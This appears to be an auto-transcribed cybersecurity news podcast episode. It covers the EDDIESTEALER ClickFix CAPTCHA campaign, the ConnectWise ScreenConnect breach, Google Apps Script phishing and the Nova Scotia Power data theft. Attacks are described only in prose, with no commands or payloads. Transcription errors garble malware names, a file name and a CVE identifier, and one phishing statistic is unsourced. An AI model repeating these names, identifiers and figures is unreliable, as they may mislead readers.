Cybersecurity Incidents: Eddie Steeler Malware, ConnectWise Breach, and Nova Scotia Power Data Theft

David Shipley

New Eddie Stealer malware distributed via ClickFix CAPTCHA Phishing ConnectWise breached in cyber attack linked to nation state threat actors now abusing Google Apps script in phishing attacks and thieves gain access to about 140,000 social insurance numbers in the Nova Scotia Power Breach. This is Cybersecurity Today and I'm your host David Shipley. Let's get started. A new malware campaign is distributing a novel Rust based information stealer dubbed Eddie Stealer using the popular Clicks Fix social engineering tactic initiated via fake Captcha verification pages. The campaign leverages deceptive Captcha verification pages that trick users into executing a malicious PowerShell script which ultimately deploys the info stealer harvesting sensitive data such as credentials, browser information and cryptocurrency wallet details. According to Elastic Security Labs, the attck chain begins with threat actors compromising legitimate websites with malicious JavaScript payloads that serve bogus Captcha check pages which prompt site visitors to prove you are not a robot by following a three step process. A prevalent tactic called Click Fix Click Fix involves instructing potential victims to open the windows Run dialog prompt, paste an already copied command into the verification window, for example, the Run dialog and press Enter. This effectively causes the obfuscated PowerShell command to be executed, resulting in the retrieval of the next stage of the payload from an external server. The JavaScript payload G verify GJS is subsequently saved to the victim's download folder and executed using C script in a hidden window. The main goal of this intermediate script is to fetch the eddysteeler binary from the same remote server and store it in the Downloads folder with the SIDO random 12 character file name. Remember written in Rust. Eddystealer is a commodity stealer malware that can gather system metadata, receive tasks from a Command and control or C2 server, and siphon data of interest from infected hosts. The exfiltration targets include cryptocurrency wallets, web browsers, password managers, FTP clients and messaging apps. IT management software firm Connectwise says a suspected state sponsored cyberattack breached its environment and impacted a quote, limited number of Screen Connect customers. Connectwise said that it recently learned of suspicious activity within its environment that it believed was tied to a sophisticated nation state actor which they say affected a very small number of Screen Connect customers. In a brief advisory note quote we have launched an investigation with one of the leading forensic experts, Mandiant. We have contacted all the affected customers and are now coordinating with law enforcement and end quote. Connectwise is a Florida based software company that provides IT management remote monitoring and management RMM cybersecurity and automation solutions for managed service providers and IT departments. One of its products is ScreenConnect, a remote access and support tool that allows technicians to securely connect to client systems for troubleshooting, patching and system maintenance. As first reported by crn, the company now says it has implemented an enhanced monitoring and hardening of security access across its network. They also state that they have not seen any further suspicious activity in customer instances. ConnectWise did not answer questions from Bleeping Computer about how many customers were impacted when the breach occurred or whether any malicious activity was observed in customer Screen Connect instances. However, a source told Bleeping Computer that a breach occurred in August 2024, that ConnectWise discovered this activity in May 2025, and that it only impacted cloud based Screen Connect instances. Bleeping Computer says they have not been able to independently confirm those breach dates. Jason Slagle, president of managed service provider cnwr, told Bleeping Computer that only a very small number of customers were impacted, suggesting the threat actor carried out a targeted attack against specific organizations. In a Reddit threat, customers shared further details stating the incident is linked to a high severity Screen Connect Vulnerability tracked as CVE2025 3935, which a patch was issued on April 24th. Howard Solomon has a great story that gives a Google twist to the abuse of the Microsoft domain that Jim reported on earlier this week. Threat actors have discovered a way to abuse Google Apps scripts to sneak links into malicious websites past phishing defenses. According to new research from Cofens, this new attack has been discovered and if an employee clicks on a link in a phishing email, they get taken to a page on script.google.com now what is a Google Apps script? Apps Script is A cloud based JavaScript platform powered by Google Drive that lets developers integrate with and automate tasks across different Google products. With it, Google says developers can add custom menus, dialogues and sidebars to Google Docs sheets and forms, write custom functions and macros for Google Sheets, publish web apps either standalone or embedded in Google Sites interact with other Google services including AdSense Analytic, Calendar Drive, Gmail Maps and more. The attacker is betting the user will see and trust the Google brand and therefore trust the content. By using a trusted platform to host the phishing page, the threat actor creates the false sense of security, obscuring the underlying threat with the goal of getting the recipient to enter their email and password without thinking about it, says the report from Cofens. CISOs need to remind employees in regular security awareness training sessions to not let their guard down and to read your email closely for scam clues. They also need to be reminded that a caution popping up that a message is using a tool from a well known brand like Google is no guarantee the message is safe and a reminder for all listeners. Email filters are fallible. If your team believes that no possible phishes can get by your email filter, they can actually click 140% more on phishing scams. So make sure they know their vigilance can make all the difference. Nova Scotia Power CEO says up to 140,000 social insurance numbers could have been stolen by cyber thieves who recently hacked into the utility's customer records. Peter Gregg said in an interview with the Canadian Press Thursday that the privately owned utility collected the numbers from customers to authenticate their identities. For example, Greg said that they needed the social insurance numbers to differentiate people who had the same name. If there are a number of John McDonald's in the province, the social insurance number determines which one the utility was talking to. On May 23, Greg said the data of about 280,000 Nova Scotia Power customers was breached in a ransomware attack, more than half of the total. Asked Thursday about how many of those records contain the confidential nine digit social insurance numbers, Greg said approximately half. This breach continues to be among the largest, at least in Canada, but likely increasingly in North America, of a utility with highly sensitive customer data exposed. If you've enjoyed today's episode, please consider liking and sharing it. We want to help even more people stay on top of the crazy world of cybersecurity. We are always interested in your opinion and you can contact us@EditorialEchnewsDay CA or leave a comment under the YouTube video. I've been your host, David Shipley, sitting in for Jim Love, who will be back on Wednesday. Thanks for listening.